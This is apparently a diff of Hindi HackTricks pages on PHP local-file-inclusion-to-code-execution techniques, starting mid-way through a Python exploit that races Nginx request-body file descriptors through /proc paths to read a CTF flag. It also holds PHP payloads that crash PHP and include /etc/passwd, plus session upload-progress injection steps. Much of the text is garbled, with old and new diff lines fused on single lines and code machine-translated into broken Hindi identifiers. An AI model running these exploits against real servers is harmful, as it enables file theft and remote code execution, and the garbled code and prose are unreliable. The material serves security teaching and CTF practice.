component_num = random.randint(0, 10)
for _ in range(component_num):
pid = random.choice(nginx_pids)
if random.randint(0, 1) == 0:
path += f"/proc/{pid}/cwd"
else:
path += f"/proc/{pid}/root"
return path
def read_file(requests_session, nginx_pid, fd, nginx_pids):
nginx_pid_list = list(nginx_pids)
while True:
path = generate_random_path_prefix(nginx_pid_list)
path += f"/proc/{nginx_pid}/fd/{fd}"
try:
d = requests_session.get(SERVER + f"/?action=include&file={path}").text
except:
continue
# Flags are formatted as hxp{<flag>}
if "hxp" in d:
print("Found flag! ")
print(d)
def read_file_worker(requests_session, nginx_pid, nginx_pids):
# Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
for fd in range(10, 45):
thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
thread.start()
def read_file_multiprocess(requests_session, nginx_pids):
for nginx_pid in nginx_pids:
p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
p.start()
if __name__ == "__main__":
print('[DEBUG] Creating requests session')
requests_session = create_requests_session()
print('[DEBUG] Getting Nginx pids')
nginx_pids = get_nginx_pids(requests_session)
print(f'[DEBUG] Nginx pids: {nginx_pids}')
print('[DEBUG] Starting payload sending')
send_payload_multiprocess(requests_session)
print('[DEBUG] Starting fd readers')
read_file_multiprocess(requests_session, nginx_pids)
``` ```
## प्रयोगशालाएं ```html
<h2>भेजें_पेलोड_कार्यकर्ता(अनुरोध_सत्र):</h2>
<p>जब तक: भेजें_पेलोड(अनुरोध_सत्र)</p>
<h2>भेजें_पेलोड_बहुप्रक्रिया(अनुरोध_सत्र):</h2>
<p># सभी सीपीयू का उपयोग करें ताकि Nginx के लिए अनुरोध शरीर के रूप में पेलोड भेजा जा सके</p>
<p>के लिए \_ in range(multiprocessing.cpu\_count()): p = multiprocessing.Process(target=भेजें_पेलोड_कार्यकर्ता, args=(अनुरोध_सत्र,)) p.start()</p>
<h2>यादृच्छिक_पथ_उपसर्ग_उत्पन्न_करें(nginx\_pids):</h2>
<p># यह विधि यादृच्छिक संख्या के ProcFS पथ घटकों से एक पथ बनाती है। एक उत्पन्न पथ इस प्रकार दिखेगा /proc/\<nginx pid 1>/cwd/proc/\<nginx pid 2>/root/proc/\<nginx pid 3>/root path = "" component\_num = random.randint(0, 10) for \_ in range(component\_num): pid = random.choice(nginx\_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path</p>
<h2>फ़ाइल_पढ़ें(अनुरोध_सत्र, nginx\_pid, fd, nginx\_pids):</h2>
<p>nginx\_pid\_सूची = list(nginx\_pids) while True: path = यादृच्छिक_पथ_उपसर्ग_उत्पन्न_करें(nginx\_pid\_सूची) path += f"/proc/{nginx\_pid}/fd/{fd}" try: d = requests\_session.get(SERVER + f"/?action=include\&file={path}").text except: continue # ध्वज हेक्सपी{} के रूप में स्वरूपित होते हैं अगर "hxp" में d है: print("ध्वज पाया गया! ") print(d)</p>
<h2>फ़ाइल_पढ़ें_कार्यकर्ता(अनुरोध_सत्र, nginx\_pid, nginx\_pids):</h2>
<p># एक लूप में 10 - 45 के बीच Nginx FDs स्कैन करें। क्योंकि फ़ाइलें और सॉकेट बंद होते रहते हैं - यह अनुरोध शरीर FD को इस सीमा के भीतर खोलना बहुत सामान्य है जिसके लिए fd in range(10, 45): thread = threading.Thread(target = फ़ाइल_पढ़ें, args = (अनुरोध_सत्र, nginx\_pid, fd, nginx\_pids)) thread.start()</p>
<h2>फ़ाइल_पढ़ें_बहुप्रक्रिया(अनुरोध_सत्र, nginx\_pids):</h2>
<p>के लिए nginx\_pid in nginx\_pids: p = multiprocessing.Process(target=फ़ाइल_पढ़ें_कार्यकर्ता, args=(अनुरोध_सत्र, nginx\_pid, nginx\_pids)) p.start()</p>
<p>यदि **नाम** == "**मुख्य**": print('\[DEBUG] अनुरोध सत्र बनाना') requests\_session = create\_requests\_session() print('\[DEBUG] Nginx pids प्राप्त करना') nginx\_pids = get\_nginx\_pids(requests\_session) print(f'\[DEBUG] Nginx pids: {nginx\_pids}') print('\[DEBUG] पेलोड भेजना शुरू करना') send\_payload\_multiprocess(requests\_session) print('\[DEBUG] fd पठक पढ़ना शुरू करना') read\_file\_multiprocess(requests\_session, nginx\_pids)</p>
```
```
## Labs
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz) * [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/) * [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/) * [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
## संदर्भ ## References
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) * [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
You can check their website and try their engine for **free** at:
<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>Support HackTricks</summary>
HackTricks का समर्थन करने के अन्य तरीके: * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details> </details>
{% endhint %}
```

View file

@ -1,20 +1,21 @@
# LFI2RCE के माध्यम से सेगमेंटेशन फॉल्ट # LFI2RCE के माध्यम से सेगमेंटेशन फॉल्ट
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके.
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
वाइटअप्स [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (दूसरा भाग) और [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) के अनुसार, निम्नलिखित payloads ने PHP में सेगमेंटेशन फॉल्ट का कारण बनाया: लेखन के अनुसार [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (दूसरा भाग) और [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), निम्नलिखित payloads ने PHP में सेगमेंटेशन फॉल्ट का कारण बनाया:
```php ```php
// PHP 7.0 // PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd"); include("php://filter/string.strip_tags/resource=/etc/passwd");
@ -22,9 +23,9 @@ include("php://filter/string.strip_tags/resource=/etc/passwd");
// PHP 7.2 // PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA"); include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
``` ```
आपको यह जानना चाहिए कि अगर आप **POST** अनुरोध **भेजते हैं** जिसमें एक **फ़ाइल** हो, तो PHP उस फ़ाइल की सामग्री के साथ **`/tmp/php<something>`** में एक **अस्थायी फ़ाइल बनाएगा**। यह फ़ाइल **स्वचालित रूप से हटा दी जाएगी** एक बार अनुरोध प्रसंस्कृत हो जाए आपको यह जानना चाहिए कि अगर आप एक **POST** अनुरोध **भेजते हैं** जिसमें एक **फ़ाइल** होती है, तो PHP उस फ़ाइल की सामग्री के साथ **`/tmp/php<something>`** में एक **अस्थायी फ़ाइल बनाएगा**। यह फ़ाइल **स्वचालित रूप से हटा दी जाएगी** एक बार अनुरोध प्रोसेस हो जाने के बाद
अगर आपको **LFI** मिलता है और आप PHP में **सेगमेंटेशन फॉल्ट को ट्रिगर** करने में कामयाब होते हैं, तो **अस्थायी फ़ाइल कभी नहीं हटाई जाएगी**। इसलिए, आप इसे **LFI** भेद्यता के साथ खोज सकते हैं जब तक आप इसे नहीं मिलता और विचारात्मक कोड को क्रियान्वित कर सकते हैं। अगर आपको एक **LFI** मिल जाता है और आप PHP में **सेगमेंटेशन फॉल्ट** को **ट्रिगर** करने में कामयाब होते हैं, तो **अस्थायी फ़ाइल कभी नहीं हटाई जाएगी**। इसलिए, आप उसे **LFI** जोख सकते हैं तकि आप उसे खोज सकें और विचारात्मक कोड का निषेध कर सकें।
आप [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) का उपयोग परीक्षण के लिए कर सकते हैं। आप [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) का उपयोग परीक्षण के लिए कर सकते हैं।
```python ```python
@ -69,16 +70,17 @@ bruteforce(charset)
if __name__ == "__main__": if __name__ == "__main__":
main() main()
``` ```
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम ग्रुप**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# LFI2RCE के माध्यम से PHP\_SESSION\_UPLOAD\_PROGRESS # LFI2RCE के माध्यम से PHP\_SESSION\_UPLOAD\_PROGRESS
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में **पीआर** सबमिट करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## मूल जानकारी ## मूल जानकारी
अगर आपने **स्थानीय फ़ाइल समावेशन** पाया है भले ही आपके पास **कोई सत्र न हो** और `session.auto_start` `ऑफ` है। अगर **`session.upload_progress.enabled`** **`ऑन`** है और आप **मल्टीपार्ट POST** डेटा में **`PHP_SESSION_UPLOAD_PROGRESS`** प्रदान करते हैं, तो PHP **आपके लिए सत्र सक्षम कर देगा** अगर आपने **स्थानीय फ़ाइल समावेशन** पाया है भले ही आपके पास **कोई सत्र न हो** और `session.auto_start` `ऑफ` है। अगर **`session.upload_progress.enabled`** **`ऑन`** है और आप **`PHP_SESSION_UPLOAD_PROGRESS`** को **मल्टीपार्ट POST** डेटा में प्रदान करते हैं, तो PHP **आपके लिए सत्र सक्षम कर देगा**
```bash ```bash
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' $ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/ $ ls -a /var/lib/php/sessions/
@ -30,19 +31,19 @@ $ ls -a /var/lib/php/sessions/
In the last example the session will contain the string blahblahblah In the last example the session will contain the string blahblahblah
``` ```
सावधान रें कि **`PHP_SESSION_UPLOAD_PROGRESS`** के साथ आप **सत्र के अंदर डेटा को नियंत्रित कर सकते हैं**, इसलिए अगर आप अपने सत्र फ़ाइल को शामिल करते हैं तो आप एक हिस्सा शामिल कर सकते हैं जिसे आप नियंत्रित करते हैं (उदाहरण के लिए एक PHP शैलकोड)। ोट रें कि **`PHP_SESSION_UPLOAD_PROGRESS`** के साथ आप **सत्र के अंदर डेटा को नियंत्रित कर सकते हैं**, इसलिए अगर आप अपने सत्र फ़ाइल को शामिल करते हैं तो आप एक हिस्सा शामिल कर सकते हैं जिसे आप नियंत्रित करते हैं (उदाहरण के लिए एक PHP शैलकोड)।
{% hint style="info" %} {% hint style="info" %}
हालांकि इंटरनेट पर अधिकांश ट्यूटोरियल आपको डीबगिंग के उद्देश्य से `session.upload_progress.cleanup` को `Off` पर सेट करने की सिफारिश करते हैं। PHP में डिफ़ॉल्ट `session.upload_progress.cleanup` अब भी `On` है। इसका मतलब है कि आपका सत्र में अपलोड प्रगति को जल्द से जल्द साफ किया जाएगा। इसलिए यह **रेस कंडीशन** होगा। हालांकि इंटरनेट पर अधिकांश ट्यूटोरियल आपको डीबगिंग उद्देश्य के लिए `session.upload_progress.cleanup` को `Off` पर सेट करने की सिफारिश करते हैं। PHP में डिफ़ॉल्ट `session.upload_progress.cleanup` अब भी `On` है। इसका मतलब है कि आपका सत्र में अपलोड प्रगति को जल्द से जल्द साफ किया जाएगा। इसलिए यह **रेस कंडीशन** होगा।
{% endhint %} {% endhint %}
### CTF ### सीटीएफ
[**मूल CTF**](https://blog.orange.tw/2018/10/) में जहाँ इस तकनीक पर टिप्पणी की गई है, वहाँ रेस कंडीशन का शोषण करना पर्याप्त नहीं था बल्कि लोड किया गया सामग्री भी `@<?php` स्ट्रिंग के साथ शुरू होनी चाहिए थी। [**मूल CTF**](https://blog.orange.tw/2018/10/) में जहां इस तकनीक पर टिप्पणी की गई है, वहां रेस कंडीशन का शोषण करना पर्याप्त नहीं था बल्कि लोड किया गया सामग्री भी `@<?php` स्ट्रिंग के साथ शुरू होनी चाहिए थी।
`session.upload_progress.prefix` की डिफ़ॉल्ट सेटिंग के कारण, हमारी **सत्र फ़ाइल एक परेशान करने वाला उपसर्ग से शुरू होगी** `upload_progress_` जैसे: `upload_progress_controlledcontentbyattacker` `session.upload_progress.prefix` की डिफ़ॉल्ट सेटिंग के कारण, हमारी **सत्र फ़ाइल एक परेशान करने वाला उपसर्ग से शुरू होगी** `upload_progress_` जैसे: `upload_progress_controlledcontentbyattacker`
**आरंभिक उपसर्ग को हटाने** का तरीका थ**पेयलोड को 3 बार base64encode करना** और फिर `convert.base64-decode` फ़िल्टर के माध्यम से इसे डिकोड करना, यह इसलिए क्योंकि **जब भी base64 डिकोड होता है तो PHP अजीब वर्ण हटा देगा**, इसलिए 3 बार के बाद **केवल** हमें आक्रमणकर्ता द्वारा **भेजा गया पेयलोड ही बचेगा** (और फिर आक्रमणकर्ता आरंभिक हिस्से को नियंत्रित कर सकता है)। **आदि उपसर्ग को हटाने** का तरीका **पेयलोड को 3 बार base64encode करना** था और फिर `convert.base64-decode` फ़िल्टर के माध्यम से इसे डिकोड करना था, यह इसलिए क्योंकि **जब भी base64 डिकोडिंग होगी तो PHP अजीब वर्ण हटा देगा**, इसलिए 3 बार के बाद **केवल** हमें अटैकर द्वारा **भेजा गया पेयलोड ही बचेगा** (और फिर अटैकर प्रारंभिक हिस्से को नियंत्रित कर सकेगा)।
अधिक जानकारी के लिए मूल लेख में जाएं [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) और अंतिम शोषण [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py)\ मूल लेख में अधिक जानकारी [https://blog.orange.tw/2018/10/](https://blog.orange.tw/2018/10/) और अंतिम शोषण [https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py](https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp\_for\_php.py)\
एक और लेख में [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) एक और लेख में [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)

View file

@ -1,31 +1,33 @@
# ब्राउज़र HTTP रिक्वेस्ट स्मगलिंग # ब्राउज़र HTTP रिक्वेस्ट स्मगलिंग
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS रेड टीम एक्सपर्ट)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}
**पोस्ट की जाँच करें [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)** **पोस्ट की जाँच करें [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS रेड टीम एक्सपर्ट)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
